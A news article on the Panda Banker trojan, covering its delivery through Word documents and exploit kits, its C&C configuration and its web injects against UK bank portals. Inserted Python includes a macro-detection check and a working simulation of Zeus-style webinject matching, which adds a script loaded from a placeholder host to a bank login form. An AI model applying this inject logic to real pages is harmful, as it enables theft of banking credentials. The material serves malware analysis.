Panda Banker targets only banks in Australia, the UK

Apr 20, 2016 22:10 GMT  ·  By

Malware analysts from Proofpoint and Fox-IT InTELL have come across a new banking trojan with roots in the old Zeus trojan, targeting banks in Australia and the UK.

First detected on March 10, the new trojan, named Panda Banker, spreads the way many banking trojans do: through weaponized Word documents.

These documents either exploit known Microsoft Office vulnerabilities (CVE-2014-1761 and CVE-2012-0158, patched by Microsoft in 2014 and 2012 respectively, so this path only works against unpatched Office installs) or rely on social engineering, trying to convince users to enable macros in the document, which works on any install where the user clicks through the warning.
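A practical check that follows from the macro delivery route: mail-gateway or sandbox triage can look inside a Word attachment for a VBA project instead of trusting its extension. The Python below is an added example, not Proofpoint's tooling or anything recovered from the campaign; it builds two constructed OOXML files in memory (one macro-enabled, one plain) and flags the macro-bearing one. It covers only the zip-based OOXML formats; legacy .doc files and the RTF documents that carry CVE-2014-1761 need an OLE or RTF parser instead.

```python
import io
import zipfile

# Content types Word assigns to the main part of macro-enabled (.docm) and
# plain (.docx) documents, and to the embedded VBA project part.
MACRO_MAIN_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
VBA_PART_CT = "application/vnd.ms-office.vbaProject"


def build_sample_docx(with_macros):
    """Build a minimal OOXML Word file in memory. Constructed test data for
    this example only; it is not a real document from the campaign."""
    overrides = ['<Override PartName="/word/document.xml" ContentType="%s"/>'
                 % (MACRO_MAIN_CT if with_macros else PLAIN_MAIN_CT)]
    if with_macros:
        overrides.append('<Override PartName="/word/vbaProject.bin" ContentType="%s"/>' % VBA_PART_CT)
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        + "".join(overrides) + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            # A real vbaProject.bin is an OLE compound file; the CFB magic is enough here.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8)
    return buf.getvalue()


def macro_indicators(data):
    """Inspect the zip contents, not the filename. Returns three booleans."""
    result = {"ooxml": False, "vba_part": False, "macro_content_type": False}
    if not data.startswith(b"PK\x03\x04"):
        return result  # RTF or OLE .doc: not OOXML, needs a different parser
    try:
        z = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result
    with z:
        names = z.namelist()
        result["ooxml"] = "[Content_Types].xml" in names
        # vbaProject.bin is where Word stores VBA; compare case-insensitively
        result["vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        if result["ooxml"]:
            ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
            result["macro_content_type"] = MACRO_MAIN_CT in ct or VBA_PART_CT in ct
    return result


def should_quarantine(data):
    """Flag any OOXML document that carries a VBA part or declares itself macro-enabled."""
    ind = macro_indicators(data)
    return ind["vba_part"] or ind["macro_content_type"]


if __name__ == "__main__":
    for label, doc in (("macro-enabled", build_sample_docx(True)), ("plain", build_sample_docx(False))):
        print(label, macro_indicators(doc), "quarantine" if should_quarantine(doc) else "pass")
```

The check keys on the zip contents rather than the extension because the filename is attacker-controlled. It is one signal, not a verdict: a document with no VBA part at all can still carry one of the two Office exploits mentioned above.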

Once that happens and Panda Banker gains a foothold on the victim's PC, it gathers information about the infected host and sends it to its C&C (command and control) server, which uses that data to fingerprint the host so it can tell it apart from other bots.

Panda Banker only targets banks operating in the UK and Australia

The information Panda Banker sends to its C&C server from each infected host includes the current username, installed antivirus and firewall products, OS version details, computer name, local time, and more.

The server then responds with a configuration file in JSON format containing a list of alternative C&C domains and a list of websites into which the trojan should inject malicious code.

These websites are banking portals. Proofpoint has seen the trojan targeting customers of banks such as Santander, Lloyds Bank, Bank of Scotland, TSB, and Halifax UK.

Panda Banker also distributed via exploit kits

Its normal mode of operation resembles that of Zeus: it hijacks the browser process and injects malicious code into the web pages of the banking portals listed in its configuration, a man-in-the-browser web inject, and steals the user's login credentials from the modified page.
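To make the configuration and web-inject flow from the two passages above concrete, here is an added example in Python; it is not Panda Banker's code or Proofpoint's analysis tooling. The config it parses is constructed for the example: the field names (c2, webinjects, set_url, data_before, data_inject, data_after) follow the Zeus webinject convention and are an assumption about Panda's real schema, and the hosts and HTML are invented. It shows how a URL mask selects the pages to tamper with and what the hooked browser then renders; the same functions are what an analyst would run over a recovered config to list the targeted banks.

```python
import json
import re

# Constructed configuration in the shape the article describes: fallback C&C
# domains plus a list of web-inject targets. Field names, hosts and inject
# bodies are assumptions for this example, not Panda Banker's real schema.
SAMPLE_CONFIG = json.dumps({
    "c2": ["c2-primary.invalid", "c2-backup-1.invalid", "c2-backup-2.invalid"],
    "webinjects": [
        {
            "set_url": "https://*.example-bank.test/online/login*",
            "data_before": '<form id="login">',
            "data_inject": '<script src="https://inject-host.invalid/l.js"></script>',
            "data_after": "</form>",
        },
        {
            "set_url": "https://retail.example-bank.test/accounts/*",
            "data_before": "<body>",
            "data_inject": '<div id="ats"></div>',
            "data_after": "",
        },
    ],
})


def parse_config(text):
    """Split the server response into the two lists the article mentions."""
    cfg = json.loads(text)
    return list(cfg["c2"]), list(cfg["webinjects"])


def mask_to_regex(mask):
    """Zeus-style URL masks: '*' matches any run of characters, all else is literal."""
    return re.compile("^" + ".*".join(re.escape(p) for p in mask.split("*")) + "$", re.IGNORECASE)


def matching_injects(injects, url):
    """Injects whose set_url mask covers the page URL the browser is loading."""
    return [i for i in injects if mask_to_regex(i["set_url"]).match(url)]


def targeted_hosts(injects):
    """Host part of each mask: the quickest way to answer 'which banks?' from a config."""
    hosts = set()
    for i in injects:
        m = re.match(r"^[a-z]+://([^/]+)", i["set_url"], re.IGNORECASE)
        if m:
            hosts.add(m.group(1).lower())
    return hosts


def apply_inject(html, inject):
    """Insert data_inject right after data_before, provided data_after follows it.
    A simplification of the Zeus anchoring rules, enough to show the effect."""
    start = html.find(inject["data_before"])
    if start < 0:
        return html
    at = start + len(inject["data_before"])
    if inject["data_after"] and html.find(inject["data_after"], at) < 0:
        return html
    return html[:at] + inject["data_inject"] + html[at:]


def render_page(injects, url, html):
    """What the victim's browser ends up displaying: every matching inject applied in order."""
    for inject in matching_injects(injects, url):
        html = apply_inject(html, inject)
    return html


if __name__ == "__main__":
    c2, injects = parse_config(SAMPLE_CONFIG)
    print("fallback C&C:", c2)
    print("targeted hosts:", sorted(targeted_hosts(injects)))
    # Constructed login page. TLS does not help the bank here: the inject happens
    # inside the hooked browser, after the page has been decrypted.
    page = '<html><body><form id="login"><input name="user"><input name="pass"></form></body></html>'
    print(render_page(injects, "https://www.example-bank.test/online/login?lang=en", page))
```

The matching is done on the full URL, which is why a mask with a wildcard host catches every subdomain of the bank while leaving other sites untouched; that selectivity is what keeps an infected host quiet until the victim actually visits a targeted portal.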

Besides infecting users via Word documents, Proofpoint has also seen the crooks use three different exploit kits (Angler, Nuclear, and Neutrino) to deliver the trojan to unsuspecting victims. The most notable detail of the campaign is that the crooks applied geo-location filters so that only Australian and British users would be infected.

"Like many modern banking Trojans, Panda Banker appears to have roots in Zeus with sophisticated means of establishing persistence and uses in both targeted and widespread attacks," Proofpoint noted. "Banking Trojans like Zeus, Dyre, Tinba, and Dridex have netted cybercriminals billions of dollars by stealing banking credentials and, in many cases, generating fraudulent transactions."

Panda Banker Automatic Transfer System (ATS) panel